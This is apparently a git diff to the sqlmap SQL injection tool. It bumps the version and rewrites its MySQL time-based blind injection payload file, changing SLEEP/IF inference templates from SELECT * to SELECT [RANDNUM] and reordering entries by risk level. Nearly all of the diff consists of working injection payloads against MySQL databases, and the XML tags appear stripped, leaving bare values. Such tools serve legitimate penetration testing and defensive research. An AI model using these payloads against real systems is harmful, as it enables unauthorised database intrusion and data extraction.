diff --git a/lib/core/settings.py b/lib/core/settings.py index b01e30c70..cf42c6c55 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -18,7 +18,7 @@ from lib.core.enums import OS from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.3.5.114" +VERSION = "1.3.5.115" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml index 6423a8050..dc710757e 100644 --- a/xml/payloads/time_blind.xml +++ b/xml/payloads/time_blind.xml @@ -2,98 +2,18 @@ - - MySQL >= 5.0.12 AND time-based blind - 5 - 1 - 1 - 1,2,3,8,9 - 1 - AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - AND SLEEP([SLEEPTIME]) - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 OR time-based blind - 5 - 1 - 3 - 1,2,3,9 - 1 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR SLEEP([SLEEPTIME]) - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 AND time-based blind (comment) - 5 - 3 - 1 - 1,2,3,9 - 1 - AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - AND SLEEP([SLEEPTIME]) - # - - - - -
- MySQL - >= 5.0.12 -
- - - - MySQL >= 5.0.12 OR time-based blind (comment) - 5 - 3 - 3 - 1,2,3,9 - 1 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR SLEEP([SLEEPTIME]) - # - - - - -
- MySQL - >= 5.0.12 -
- + MySQL >= 5.0.12 AND time-based blind (query SLEEP) 5 - 2 + 1 1 1,2,3,8,9 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) @@ -107,13 +27,95 @@ MySQL >= 5.0.12 OR time-based blind (query SLEEP) 5 + 1 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 AND time-based blind (SLEEP) + 5 + 2 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 OR time-based blind (SLEEP) + 5 2 3 1,2,3,9 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # @@ -131,9 +133,9 @@ 1 1,2,3,9 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) # @@ -152,9 +154,9 @@ 3 1,2,3,9 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) # @@ -296,9 +298,9 @@ 1 1,2,3,9 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) @@ -316,9 +318,9 @@ 1 1,2,3,9 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) # @@ -1490,9 +1492,9 @@ 1 1,2,3,9 3 - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])